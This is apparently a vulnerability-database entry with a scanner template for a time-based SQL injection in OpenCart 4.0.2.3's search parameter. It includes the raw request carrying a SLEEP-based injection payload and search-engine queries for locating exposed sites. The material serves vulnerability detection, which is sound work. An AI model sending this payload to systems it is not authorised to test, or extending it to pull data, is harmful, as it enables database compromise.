opencart-core-sqli: OpenCart Core 4.0.2.3 'search' - SQL Injection

2025-08-01 OpenCart Core PoC Public

Description

Opencart allows SQL Injection via parameter 'search' in /index.php?route=product/search&search=. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

PoC

id: opencart-core-sqli

info:
  name: OpenCart Core 4.0.2.3 'search' - SQL Injection
  author: s4e-io
  severity: high
  description: |
    Opencart allows SQL Injection via parameter 'search' in /index.php?route=product/search&search=. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
  reference:
    - https://www.exploit-db.com/exploits/51940
    - https://cxsecurity.com/issue/WLB-2024040004
  classification:
    cpe: cpe:2.3:a:opencart:opencart:*:*:*:*:*:*:*:*
    cwe-id: CWE-89
  metadata:
    max-request: 2
    shodan-query: title:"OpenCart"
    fofa-query: icon_hash="-1443008128"
    product: opencart
    vendor: opencart
  tags: time-based-sqli,opencart,sqli,vuln
flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: dsl
        dsl:
          - 'contains(header, "OCSESSID=")'
          - 'contains_any(body, "opencart.com", "OpenCart is open source", "content=\"OpenCart")'
        condition: or
        internal: true

  - raw:
      - |
        @timeout: 15s
        GET /index.php?route=product/search&search=')+AND+(SELECT+8368+FROM+(SELECT(SLEEP(7)))uUDJ)--+Nabb HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "duration>=7"
          - 'contains(body, "Nabb</title>")'
          - "status_code == 200"
        condition: and
# digest: 4a0a0047304502201d7cb544a713e9d15502cb1d0482a3f1f2759da02ef2bcdc9e4fee44bc50524d022100db4ad97305a34a3182efff37e18de98ea3aa185a96e1828b727a4a68b0643a52:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities